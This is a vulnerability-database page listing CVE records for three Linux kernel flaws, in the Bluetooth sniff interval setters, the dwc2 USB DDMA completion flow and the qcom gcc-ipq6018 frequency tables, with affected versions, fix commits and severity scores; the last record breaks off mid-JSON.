References

URL

Tags

https://bugzilla.openanolis.cn/show_bug.cgi?id=8153

Impacted products

	Vendor	Product	Version
	Linux	Linux kernel	Affected: v4.0-rc1 , < v6.8-rc2 (custom)

Credits

白家驹 <baijiaju@buaa.edu.cn> 韩桂栋 <hanguidong@buaa.edu.cn>

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-24859",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-05T15:33:58.445018Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:25.429Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:28:12.892Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8153"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "modules": [
            "bluetooth"
          ],
          "packageName": "kernel",
          "platforms": [
            "Linux",
            "x86",
            "ARM"
          ],
          "product": "Linux kernel",
          "programFiles": [
            "https://gitee.com/anolis/cloud-kernel/blob/devel-5.10/net/bluetooth/hci_debugfs.c"
          ],
          "repo": "https://gitee.com/anolis/cloud-kernel.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "v6.8-rc2",
              "status": "affected",
              "version": "v4.0-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "\u767d\u5bb6\u9a79 \u003cbaijiaju@buaa.edu.cn\u003e"
        },
        {
          "lang": "en",
          "type": "reporter",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "\u97e9\u6842\u680b \u003changuidong@buaa.edu.cn\u003e"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eA race condition was found in the Linux kernel\u0027s net/bluetooth in sniff_{min,max}_interval_set() function. This can result in a bluetooth sniffing exception issue, possibly leading denial of service.\u003cbr\u003e\u003c/p\u003e\n\n\n\n\n"
            }
          ],
          "value": "A race condition was found in the Linux kernel\u0027s net/bluetooth in sniff_{min,max}_interval_set() function. This can result in a bluetooth sniffing exception issue, possibly leading denial of service.\n\n\n\n\n\n\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-26",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-26 Leveraging Race Conditions"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-362",
              "description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-02-05T07:28:06.115Z",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8153"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://lore.kernel.org/lkml/20231222162931.6553-1-2045gemini@gmail.com/\"\u003ehttps://lore.kernel.org/lkml/20231222162931.6553-1-2045gemini@gmail.com/\u003c/a\u003e\u003cbr\u003e"
            }
          ],
          "value": " https://lore.kernel.org/lkml/20231222162931.6553-1-2045gemini@gmail.com/ https://lore.kernel.org/lkml/20231222162931.6553-1-2045gemini@gmail.com/ \n"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Race condition vulnerability in Linux kernel bluetooth sniff_{min,max}_interval_set()",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2024-24859",
    "datePublished": "2024-02-05T07:28:06.115Z",
    "dateReserved": "2024-02-01T09:11:56.214Z",
    "dateUpdated": "2024-08-01T23:28:12.892Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26997 (GCVE-0-2024-26997)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:28 – Updated: 2025-05-04 12:55

Title

usb: dwc2: host: Fix dereference issue in DDMA completion flow.

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: dwc2: host: Fix dereference issue in DDMA completion flow. Fixed variable dereference issue in DDMA completion flow.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/257d313e37d66c3bc…
	https://git.kernel.org/stable/c/75bf5e78b2a27cb1b…
	https://git.kernel.org/stable/c/26fde0ea40dda1b08…
	https://git.kernel.org/stable/c/8aa5c28ac65cb5e7f…
	https://git.kernel.org/stable/c/9de10b59d16880a0a…
	https://git.kernel.org/stable/c/8a139fa44870e84ac…
	https://git.kernel.org/stable/c/55656b2afd5f1efce…
	https://git.kernel.org/stable/c/eed04fa96c48790c1…

Impacted products

Vendor

Product

Version

Linux

Affected: dca1dc1e99e09e7b8eaccb55d6aecb87d9cb8ecd , < 257d313e37d66c3bcc87197fb5b8549129c45dfe (git)
Affected: 693bbbccd9c774adacaf03ae9fcbb33b66b1ffc4 , < 75bf5e78b2a27cb1bca6fa826e3ab685015165e1 (git)
Affected: db4fa0c8e811676a7bfe8363a01e70ee601e75f7 , < 26fde0ea40dda1b08fad3bc0a43f122f6dd8bddf (git)
Affected: 32d3f2f108ebcaf9bd9fc06095c776cb73add034 , < 8aa5c28ac65cb5e7f1b9c0c3238c00b661dd2b8c (git)
Affected: bc48eb1b53ce977d17d51caa574bd81064a117a2 , < 9de10b59d16880a0a3ae2876c142fe54ce45d816 (git)
Affected: 8d310e5d702c903a7ac95fb5dd248f046b39db00 , < 8a139fa44870e84ac228b7b76423a49610e5ba9a (git)
Affected: 8b7c57ab6f6bc6bfee87e929cab6e6dac351606b , < 55656b2afd5f1efcec4245f3e7e814c2a9ef53f6 (git)
Affected: b258e42688501cadb1a6dd658d6f015df9f32d8f , < eed04fa96c48790c1cce73c8a248e9d460b088f8 (git)
Affected: c4046e703e0083c8d2031cce02f2479e9ba2c166 (git)

Linux

Affected: 4.19.312 , < 4.19.313 (semver)
Affected: 5.4.274 , < 5.4.275 (semver)
Affected: 5.10.215 , < 5.10.216 (semver)
Affected: 5.15.154 , < 5.15.157 (semver)
Affected: 6.1.84 , < 6.1.88 (semver)
Affected: 6.6.24 , < 6.6.29 (semver)
Affected: 6.8.3 , < 6.8.8 (semver)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26997",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:40:39.519356Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:46:29.335Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.901Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/257d313e37d66c3bcc87197fb5b8549129c45dfe"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/75bf5e78b2a27cb1bca6fa826e3ab685015165e1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/26fde0ea40dda1b08fad3bc0a43f122f6dd8bddf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8aa5c28ac65cb5e7f1b9c0c3238c00b661dd2b8c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9de10b59d16880a0a3ae2876c142fe54ce45d816"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8a139fa44870e84ac228b7b76423a49610e5ba9a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/55656b2afd5f1efcec4245f3e7e814c2a9ef53f6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eed04fa96c48790c1cce73c8a248e9d460b088f8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/dwc2/hcd_ddma.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "257d313e37d66c3bcc87197fb5b8549129c45dfe",
              "status": "affected",
              "version": "dca1dc1e99e09e7b8eaccb55d6aecb87d9cb8ecd",
              "versionType": "git"
            },
            {
              "lessThan": "75bf5e78b2a27cb1bca6fa826e3ab685015165e1",
              "status": "affected",
              "version": "693bbbccd9c774adacaf03ae9fcbb33b66b1ffc4",
              "versionType": "git"
            },
            {
              "lessThan": "26fde0ea40dda1b08fad3bc0a43f122f6dd8bddf",
              "status": "affected",
              "version": "db4fa0c8e811676a7bfe8363a01e70ee601e75f7",
              "versionType": "git"
            },
            {
              "lessThan": "8aa5c28ac65cb5e7f1b9c0c3238c00b661dd2b8c",
              "status": "affected",
              "version": "32d3f2f108ebcaf9bd9fc06095c776cb73add034",
              "versionType": "git"
            },
            {
              "lessThan": "9de10b59d16880a0a3ae2876c142fe54ce45d816",
              "status": "affected",
              "version": "bc48eb1b53ce977d17d51caa574bd81064a117a2",
              "versionType": "git"
            },
            {
              "lessThan": "8a139fa44870e84ac228b7b76423a49610e5ba9a",
              "status": "affected",
              "version": "8d310e5d702c903a7ac95fb5dd248f046b39db00",
              "versionType": "git"
            },
            {
              "lessThan": "55656b2afd5f1efcec4245f3e7e814c2a9ef53f6",
              "status": "affected",
              "version": "8b7c57ab6f6bc6bfee87e929cab6e6dac351606b",
              "versionType": "git"
            },
            {
              "lessThan": "eed04fa96c48790c1cce73c8a248e9d460b088f8",
              "status": "affected",
              "version": "b258e42688501cadb1a6dd658d6f015df9f32d8f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "c4046e703e0083c8d2031cce02f2479e9ba2c166",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/dwc2/hcd_ddma.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4.19.313",
              "status": "affected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThan": "5.4.275",
              "status": "affected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThan": "5.10.216",
              "status": "affected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThan": "5.15.157",
              "status": "affected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThan": "6.1.88",
              "status": "affected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThan": "6.6.29",
              "status": "affected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThan": "6.8.8",
              "status": "affected",
              "version": "6.8.3",
              "versionType": "semver"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.19.312",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "5.4.274",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.10.215",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "5.15.154",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "6.1.84",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "6.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.8.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc2: host: Fix dereference issue in DDMA completion flow.\n\nFixed variable dereference issue in DDMA completion flow."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:18.367Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/257d313e37d66c3bcc87197fb5b8549129c45dfe"
        },
        {
          "url": "https://git.kernel.org/stable/c/75bf5e78b2a27cb1bca6fa826e3ab685015165e1"
        },
        {
          "url": "https://git.kernel.org/stable/c/26fde0ea40dda1b08fad3bc0a43f122f6dd8bddf"
        },
        {
          "url": "https://git.kernel.org/stable/c/8aa5c28ac65cb5e7f1b9c0c3238c00b661dd2b8c"
        },
        {
          "url": "https://git.kernel.org/stable/c/9de10b59d16880a0a3ae2876c142fe54ce45d816"
        },
        {
          "url": "https://git.kernel.org/stable/c/8a139fa44870e84ac228b7b76423a49610e5ba9a"
        },
        {
          "url": "https://git.kernel.org/stable/c/55656b2afd5f1efcec4245f3e7e814c2a9ef53f6"
        },
        {
          "url": "https://git.kernel.org/stable/c/eed04fa96c48790c1cce73c8a248e9d460b088f8"
        }
      ],
      "title": "usb: dwc2: host: Fix dereference issue in DDMA completion flow.",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26997",
    "datePublished": "2024-05-01T05:28:21.226Z",
    "dateReserved": "2024-02-19T14:20:24.206Z",
    "dateUpdated": "2025-05-04T12:55:18.367Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26970 (GCVE-0-2024-26970)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:19 – Updated: 2025-05-04 09:01

Title

clk: qcom: gcc-ipq6018: fix terminating of frequency table arrays

Summary

In the Linux kernel, the following vulnerability has been resolved: clk: qcom: gcc-ipq6018: fix terminating of frequency table arrays The frequency table arrays are supposed to be terminated with an empty element. Add such entry to the end of the arrays where it is missing in order to avoid possible out-of-bound access when the table is traversed by functions like qcom_find_freq() or qcom_find_freq_floor(). Only compile tested.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-125 - Out-of-bounds Read

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ae60e3342296f766f…
	https://git.kernel.org/stable/c/b4527ee3de365a742…
	https://git.kernel.org/stable/c/852db52b45ea96dac…
	https://git.kernel.org/stable/c/421b135aceace9978…
	https://git.kernel.org/stable/c/dcb13b5c9ae8743f9…
	https://git.kernel.org/stable/c/db4066e3ab6b3d918…
	https://git.kernel.org/stable/c/cdbc6e2d8108bc478…

Impacted products

Vendor

Product

Version

Linux

Affected: d9db07f088af01a1080d01de363141b673c7d646 , < ae60e3342296f766f88911d39199f77b05f657a6 (git)
Affected: d9db07f088af01a1080d01de363141b673c7d646 , < b4527ee3de365a742215773d20f07db3e2c06f3b (git)
Affected: d9db07f088af01a1080d01de363141b673c7d646 , < 852db52b45ea96dac2720f108e7c7331cd3738bb (git)
Affected: d9db07f088af01a1080d01de363141b673c7d646 , < 421b135aceace99789c982f6a77ce9476564fb52 (git)
Affected: d9db07f088af01a1080d01de363141b673c7d646 , < dcb13b5c9ae8743f99a96f392186527c3df89198 (git)
Affected: d9db07f088af01a1080d01de363141b673c7d646 , < db4066e3ab6b3d918ae2b92734a89c04fe82cc1d (git)
Affected: d9db07f088af01a1080d01de363141b673c7d646 , < cdbc6e2d8108bc47895e5a901cfcaf799b00ca8d (git)

Linux

Affected: 5.6
Unaffected: 0 , < 5.6 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "ae60e3342296",
                "status": "affected",
                "version": "d9db07f088af",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "b4527ee3de36",
                "status": "affected",
                "version": "d9db07f088af",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "852db52b45ea",
                "status": "affected",
                "version": "d9db07f088af",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "421b135aceac",
                "status": "affected",
                "version": "d9db07f088af",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "dcb13b5c9ae8",
                "status": "affected",
                "version": "d9db07f088af",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "db4066e3ab6b",
                "status": "affected",
                "version": "d9db07f088af",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "cdbc6e2d8108",
                "status": "affected",
                "version": "d9db07f088af",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.6",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.11",
                "status": "unaffected",
                "version": "5.10.215",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.16",
                "status": "unaffected",
                "version": "5.15.154",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.7",
                "status": "unaffected",
                "version": "6.6.24",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.8",
                "status": "unaffected",
                "version": "6.7.12",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.9",
                "status": "unaffected",
                "version": "6.8.3",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.9"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:5.6:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "5.6"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.2",
                "status": "unaffected",
                "version": "6.1.84",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26970",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-05T21:08:38.341203Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-125",
                "description": "CWE-125 Out-of-bounds Read",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-05T21:08:55.759Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.800Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ae60e3342296f766f88911d39199f77b05f657a6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b4527ee3de365a742215773d20f07db3e2c06f3b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/852db52b45ea96dac2720f108e7c7331cd3738bb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/421b135aceace99789c982f6a77ce9476564fb52"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dcb13b5c9ae8743f99a96f392186527c3df89198"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/db4066e3ab6b3d918ae2b92734a89c04fe82cc1d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cdbc6e2d8108bc47895e5a901cfcaf799b00ca8d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/clk/qcom/gcc-ipq6018.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ae60e3342296f766f88911d39199f77b05f657a6",
              "status": "affected",
              "version": "d9db07f088af01a1080d01de363141b673c7d646",
              "versionType": "git"
            },
            {
              "lessThan": "b4527ee3de365a742215773d20f07db3e2c06f3b",
              "status": "affected",
              "version": "d9db07f088af01a1080d01de363141b673c7d646",
              "versionType": "git"
            },
            {
              "lessThan": "852db52b45ea96dac2720f108e7c7331cd3738bb",
              "status": "affected",
              "version": "d9db07f088af01a1080d01de363141b673c7d646",
              "versionType": "git"
            },
            {
              "lessThan": "421b135aceace99789c982f6a77ce9476564fb52",
              "status": "affected",
              "version": "d9db07f088af01a1080d01de363141b673c7d646",
              "versionType": "git"
            },
            {
              "lessThan": "dcb13b5c9ae8743f99a96f392186527c3df89198",
              "status": "affected",
              "version": "d9db07f088af01a1080d01de363141b673c7d646",
              "versionType": "git"
            },
            {
              "lessThan": "db4066e3ab6b3d918ae2b92734a89c04fe82cc1d",
              "status": "affected",
              "version": "d9db07f088af01a1080d01de363141b673c7d646",
              "versionType": "git"
            },
            {
              "lessThan": "cdbc6e2d8108bc47895e5a901cfcaf799b00ca8d",
              "status": "affected",
              "version": "d9db07f088af01a1080d01de363141b673c7d646",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/clk/qcom/gcc-ipq6018.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.6"
            },
            {
              "lessThan": "5.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
